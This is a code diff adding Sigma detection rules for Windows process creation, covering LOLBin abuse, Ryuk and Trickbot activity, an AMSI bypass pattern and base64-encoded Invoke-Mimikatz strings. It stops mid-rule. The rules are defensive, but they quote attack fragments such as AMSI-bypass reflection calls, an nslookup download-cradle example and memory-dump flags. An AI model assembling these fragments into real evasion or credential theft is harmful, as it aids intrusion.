b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml new file mode 100644 index 000000000..557299157 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml @@ -0,0 +1,37 @@ +title: Invoke-Obfuscation Via Use Rundll32 +id: 36c5146c-d127-4f85-8e21-01bf62355d5a +status: deprecated +description: Detects Obfuscated Powershell via use Rundll32 in Scripts +references: + - https://github.com/SigmaHQ/sigma/issues/1009 +author: Nikita Nazarov, oscd.community +date: 2019/10/08 +modified: 2022/12/30 +tags: + - attack.defense_evasion + - attack.t1027 + - attack.execution + - attack.t1059.001 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - '&&' + - rundll32 + - shell32.dll + - shellexec_rundll + CommandLine|contains: + - value + - invoke + - comspec + - iex + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml new file mode 100644 index 000000000..53f8e6361 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml @@ -0,0 +1,36 @@ +title: Monitoring Wuauclt.exe For Lolbas Execution Of DLL +id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 +status: experimental +description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL. +references: + - https://dtm.uk/wuauclt/ +author: Sreeman +date: 2020/10/29 +modified: 2022/05/27 +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - wuauclt.exe + - /UpdateDeploymentProvider + - /Runhandlercomserver + filter: + CommandLine|contains: + - wuaueng.dll + - UpdateDeploymentProvider.dll /ClassId + condition: process_creation and (selection and not filter) +falsepositives: + - Wuaueng.dll which is a module belonging to Microsoft Windows Update. +fields: + - CommandLine +level: medium +tags: + - attack.defense_evasion + - attack.execution + - attack.t1218 +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_findstr.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_findstr.yml new file mode 100644 index 000000000..cc138bcd9 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_findstr.yml @@ -0,0 +1,49 @@ +title: Abusing Findstr for Defense Evasion +id: bf6c39fc-e203-45b9-9538-05397c1b4f3f +status: deprecated +description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism +references: + - https://lolbas-project.github.io/lolbas/Binaries/Findstr/ + - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ + - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali +date: 2020/10/05 +modified: 2022/10/12 +tags: + - attack.defense_evasion + - attack.t1218 + - attack.t1564.004 + - attack.t1552.001 + - attack.t1105 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_findstr: + - CommandLine|contains: findstr + - NewProcessName|endswith: findstr.exe + - OriginalFileName: FINDSTR.EXE + selection_cli_download_1: + CommandLine|contains: + - ' /v ' + - ' -v ' + selection_cli_download_2: + CommandLine|contains: + - ' /l ' + - ' -l ' + selection_cli_creds_1: + CommandLine|contains: + - ' /s ' + - ' -s ' + selection_cli_creds_2: + CommandLine|contains: + - ' /i ' + - ' -i ' + condition: process_creation and (selection_findstr and (all of selection_cli_download* or all of selection_cli_creds*)) +falsepositives: + - Administrative findstr usage +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_office.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_office.yml new file mode 100644 index 000000000..776dc82c5 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_office.yml @@ -0,0 +1,33 @@ +title: Suspicious File Download Using Office Application +id: 0c79148b-118e-472b-bdb7-9b57b444cc19 +status: test +description: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files +references: + - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/ + - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/ + - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/ + - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 +author: Beyu Denis, oscd.community +date: 2019/10/26 +modified: 2023/02/04 +tags: + - attack.command_and_control + - attack.t1105 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: http + NewProcessName|endswith: + - \powerpnt.exe + - \winword.exe + - \excel.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml new file mode 100644 index 000000000..7641db507 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml @@ -0,0 +1,33 @@ +title: Process Memory Dumped Via RdrLeakDiag.EXE +id: 6355a919-2e97-4285-a673-74645566340d +status: deprecated +description: Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory +references: + - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ +author: Florian Roth (Nextron Systems) +date: 2022/01/04 +modified: 2023/04/24 +tags: + - attack.defense_evasion + - attack.t1036 + - attack.t1003.001 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains: /fullmemdmp + NewProcessName|endswith: \rdrleakdiag.exe + selection2: + CommandLine|contains|all: + - /fullmemdmp + - ' /o ' + - ' /p ' + condition: process_creation and (selection1 or selection2) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml new file mode 100644 index 000000000..4dad5de5e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml @@ -0,0 +1,53 @@ +title: New Lolbin Process by Office Applications +id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 +status: deprecated +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml + - https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml + - https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A + - https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set +author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update) +date: 2021/08/23 +modified: 2023/02/04 +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defense_evasion +logsource: + product: windows + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|endswith: + - \regsvr32.exe + - \rundll32.exe + - \msiexec.exe + - \mshta.exe + - \verclsid.exe + - \msdt.exe + - \control.exe + - \msidb.exe + ParentProcessName|endswith: + - \winword.exe + - \excel.exe + - \powerpnt.exe + - \msaccess.exe + - \mspub.exe + - \eqnedt32.exe + - \visio.exe + - \wordpad.exe + - \wordview.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mal_ryuk.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mal_ryuk.yml new file mode 100644 index 000000000..a1027ebb6 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mal_ryuk.yml @@ -0,0 +1,37 @@ +title: Ryuk Ransomware Command Line Activity +id: 0acaad27-9f02-4136-a243-c357202edd74 +related: + - id: c37510b8-2107-4b78-aa32-72f251e7a844 + type: similar +status: deprecated +description: Detects Ryuk Ransomware command lines +references: + - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ +author: Vasiliy Burov +date: 2019/08/06 +modified: 2023/02/03 +tags: + - attack.execution + - attack.t1204 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains: stop + NewProcessName|endswith: + - \net.exe + - \net1.exe + selection2: + CommandLine|contains: + - samss + - audioendpointbuilder + - unistoresvc_ + condition: process_creation and (all of selection*) +falsepositives: + - Unlikely +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml new file mode 100644 index 000000000..74518c7cb --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml @@ -0,0 +1,32 @@ +title: Trickbot Malware Reconnaissance Activity +id: 410ad193-a728-4107-bc79-4419789fcbf8 +related: + - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 + type: similar +status: deprecated +description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. +references: + - https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/ + - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ +author: David Burkett, Florian Roth +date: 2019/12/28 +modified: 2023/04/28 +tags: + - attack.discovery + - attack.t1482 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: /domain_trusts /all_trusts + ParentProcessName|endswith: \cmd.exe + NewProcessName|endswith: \nltest.exe + condition: process_creation and selection +falsepositives: + - Rare System Admin Activity +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml new file mode 100644 index 000000000..891295519 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml @@ -0,0 +1,28 @@ +title: MavInject Process Injection +id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 +status: deprecated +description: Detects process injection using the signed Windows tool Mavinject32.exe +author: Florian Roth (Nextron Systems) +references: + - https://twitter.com/gN3mes1s/status/941315826107510784 + - https://reaqta.com/2017/12/mavinject-microsoft-injector/ + - https://twitter.com/Hexacorn/status/776122138063409152 +date: 2018/12/12 +modified: 2022/12/19 +tags: + - attack.t1055.001 + - attack.t1218 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: ' /INJECTRUNNING ' + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_msdt_diagcab.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_msdt_diagcab.yml new file mode 100644 index 000000000..47767c955 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_msdt_diagcab.yml @@ -0,0 +1,33 @@ +title: Execute MSDT.EXE Using Diagcab File +id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 +status: deprecated +description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190 +references: + - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab + - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0 + - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd +author: GossiTheDog, frack113 +date: 2022/06/09 +modified: 2023/02/06 +tags: + - attack.defense_evasion + - attack.t1202 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \msdt.exe + - OriginalFileName: msdt.exe + selection_cmd: + CommandLine|contains: + - ' /cab' + - ' -cab' + condition: process_creation and (all of selection_*) +falsepositives: + - Legitimate usage of ".diagcab" files +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_new_service_creation.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_new_service_creation.yml new file mode 100644 index 000000000..507e52d18 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_new_service_creation.yml @@ -0,0 +1,34 @@ +title: New Service Creation +id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab +status: deprecated +description: Detects creation of a new service. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md +author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community +date: 2019/10/21 +modified: 2023/02/20 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1543.003 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_sc: + CommandLine|contains|all: + - create + - binPath + NewProcessName|endswith: \sc.exe + selection_posh: + CommandLine|contains|all: + - New-Service + - -BinaryPathName + condition: process_creation and (1 of selection*) +falsepositives: + - Legitimate administrator or user creates a service for legitimate reasons. +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml new file mode 100644 index 000000000..1fbb4098f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml @@ -0,0 +1,27 @@ +title: Nslookup PwSh Download Cradle +id: 72671447-4352-4413-bb91-b85569687135 +status: deprecated +description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] +references: + - https://twitter.com/alh4zr3d/status/1566489367232651264 +author: Zach Mathis (@yamatosecurity) +date: 2022/09/06 +modified: 2022/12/14 # Deprecation date +tags: + - attack.command_and_control + - attack.t1105 + - attack.t1071.004 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: '=txt ' + ParentProcessName|endswith: \powershell.exe + NewProcessName|contains: nslookup + condition: process_creation and selection +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml new file mode 100644 index 000000000..05c5cab7c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_odbcconf_susp_exec.yml @@ -0,0 +1,42 @@ +title: Application Whitelisting Bypass via DLL Loaded by odbcconf.exe +id: 65d2be45-8600-4042-b4c0-577a1ff8a60e +status: deprecated +description: Detects defence evasion attempt via odbcconf.exe execution to load DLL +references: + - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ + - https://twitter.com/Hexacorn/status/1187143326673330176 + - https://redcanary.com/blog/raspberry-robin/ + - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca +author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community +date: 2019/10/25 +modified: 2023/05/22 +tags: + - attack.defense_evasion + - attack.t1218.008 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_1_img: + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe + selection_1_cli: + CommandLine|contains: + - -a + - -f + - /a + - /f + - regsvr + selection_2_parent: + ParentProcessName|endswith: \odbcconf.exe + selection_2_img: + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + condition: process_creation and (all of selection_1_* or all of selection_2_*) +falsepositives: + - Legitimate use of odbcconf.exe by legitimate user +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml new file mode 100644 index 000000000..d2f34387b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml @@ -0,0 +1,51 @@ +title: Excel Proxy Executing Regsvr32 With Payload +id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 +status: deprecated +description: | + Excel called wmic to finally proxy execute regsvr32 with the payload. + An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). + But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. + Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule) +date: 2021/08/23 +modified: 2022/12/02 +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defense_evasion +logsource: + product: windows + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + process_creation: + EventID: 4688 + Channel: Security + selection_img: + - NewProcessName|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe + selection_other: + CommandLine|contains: + - regsvr32 + - rundll32 + - msiexec + - mshta + - verclsid + CommandLine|contains|all: + - process + - create + - call + ParentProcessName|endswith: + - \winword.exe + - \excel.exe + - \powerpnt.exe + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml new file mode 100644 index 000000000..087eabaa7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml @@ -0,0 +1,53 @@ +title: Excel Proxy Executing Regsvr32 With Payload Alternate +id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 +status: deprecated +description: | + Excel called wmic to finally proxy execute regsvr32 with the payload. + An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin). + But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it. + Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule) +date: 2021/08/23 +modified: 2022/12/02 +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defense_evasion +logsource: + product: windows + category: process_creation +detection: + #useful_information: add more LOLBins to the rules logic of your choice. + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains: + - regsvr32 + - rundll32 + - msiexec + - mshta + - verclsid + selection2: + - NewProcessName|endswith: \wbem\WMIC.exe + - CommandLine|contains: 'wmic ' + selection3: + ParentProcessName|endswith: + - \winword.exe + - \excel.exe + - \powerpnt.exe + selection4: + CommandLine|contains|all: + - process + - create + - call + condition: process_creation and (all of selection*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml new file mode 100644 index 000000000..cca7a403b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_office_spawning_wmi_commandline.yml @@ -0,0 +1,41 @@ +title: Office Applications Spawning Wmi Cli Alternate +id: 04f5363a-6bca-42ff-be70-0d28bf629ead +status: deprecated +description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +references: + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule) +date: 2021/08/23 +modified: 2023/02/04 +tags: + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defense_evasion +logsource: + product: windows + category: process_creation +detection: + #useful_information: Add more office applications to the rule logic of choice + process_creation: + EventID: 4688 + Channel: Security + selection1: + - NewProcessName|endswith: \wbem\WMIC.exe + - CommandLine|contains: 'wmic ' + selection2: + ParentProcessName|endswith: + - \winword.exe + - \excel.exe + - \powerpnt.exe + - \msaccess.exe + - \mspub.exe + - \eqnedt32.exe + - \visio.exe + condition: process_creation and (all of selection*) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml new file mode 100644 index 000000000..e05210ee9 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_possible_applocker_bypass.yml @@ -0,0 +1,42 @@ +title: Possible Applocker Bypass +id: 82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719 +status: deprecated +description: Detects execution of executables that can be used to bypass Applocker whitelisting +references: + - https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt + - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1127.001/T1127.001.md +author: juju4 +date: 2019/01/16 +modified: 2022/11/03 +tags: + - attack.defense_evasion + - attack.t1218.004 + - attack.t1218.009 + - attack.t1127.001 + - attack.t1218.005 + - attack.t1218 # no way to map 1:1, so the technique level is required +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + - \msdt.exe + - \installutil.exe + - \regsvcs.exe + - \regasm.exe + #- '\regsvr32.exe' # too many FPs, very noisy + - \msbuild.exe + - \ieexec.exe + #- '\mshta.exe' + #- '\csc.exe' + condition: process_creation and selection +falsepositives: + - False positives depend on scripts and administrative tools used in the monitored environment + - Using installutil to add features for .NET applications (primarily would occur in developer environments) +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml new file mode 100644 index 000000000..fdf71a4fa --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_amsi_bypass_pattern_nov22.yml @@ -0,0 +1,34 @@ +title: PowerShell AMSI Bypass Pattern +id: 4f927692-68b5-4267-871b-073c45f4f6fe +status: deprecated +description: Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload. +author: '@Kostastsale' +references: + - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ +date: 2022/11/04 +modified: 2023/02/03 +tags: + - attack.defense_evasion + - attack.t1562.001 + - attack.execution +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + selection1: + CommandLine|contains|all: + - '[Ref].Assembly.GetType' + - SetValue($null,$true) + - NonPublic,Static + NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - \powershell_ise.exe + condition: process_creation and selection1 +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml new file mode 100644 index 000000000..2f8e5e3c7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml @@ -0,0 +1,45 @@ +title: Malicious Base64 Encoded Powershell Invoke Cmdlets +id: fd6e2919-3936-40c9-99db-0aa922c356f7 +related: + - id: 6385697e-9f1b-40bd-8817-f4a91f40508e + type: similar +status: deprecated +description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets +references: + - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ +author: pH-T (Nextron Systems) +date: 2022/05/31 +modified: 2023/01/30 +tags: + - attack.execution + - attack.t1059.001 + - attack.defense_evasion + - attack.t1027 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: + # Invoke-BloodHound + - SQBuAHYAbwBrAGUALQBCAGwAbwBvAGQASABvAHUAbgBkA + - kAbgB2AG8AawBlAC0AQgBsAG8AbwBkAEgAbwB1AG4AZA + - JAG4AdgBvAGsAZQAtAEIAbABvAG8AZABIAG8AdQBuAGQA + # Invoke-Mimikatz + - SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA + - kAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6A + - JAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAeg + # Invoke-WMIExec + - SQBuAHYAbwBrAGUALQBXAE0ASQBFAHgAZQBjA + - kAbgB2AG8AawBlAC0AVwBNAEkARQB4AGUAYw + - JAG4AdgBvAGsAZQAtAFcATQBJAEUAeABlAGMA + condition: process_creation and selection +fields: + - CommandLine +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml new file mode 100644 index 000000000..1f5d86614 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_listing_shadowcopy.yml @@ -0,0 +1,35 @@ +title: Base64 Encoded Listing of Shadowcopy +id: 47688f1b-9f51-4656-b013-3cc49a166a36 +status: deprecated +description: Detects base64 encoded listing Win32_Shadowcopy +references: + - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar +author: Christian Burkard (Nextron Systems) +date: 2022/03/01 +modified: 2023/01/30 +tags: + - attack.execution + - attack.t1059.001 + - attack.defense_evasion + - attack.t1027 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + # Win32_Shadowcopy | ForEach-Object + CommandLine|contains: + - VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQA + - cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A + - XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdA + condition: process_creation and selection +fields: + - CommandLine + - ParentCommandLine +falsepositives: + - Unlikely +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml new file mode 100644 index 000000000..b62565a5e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_powershell_base64_shellcode.yml @@ -0,0 +1,28 @@ +title: Potential PowerShell Base64 Encoded Shellcode +id: 2d117e49-e626-4c7c-bd1f-c3c0147774c8 +status: deprecated +description: Detects potential powershell Base64 encoded Shellcode +references: + - 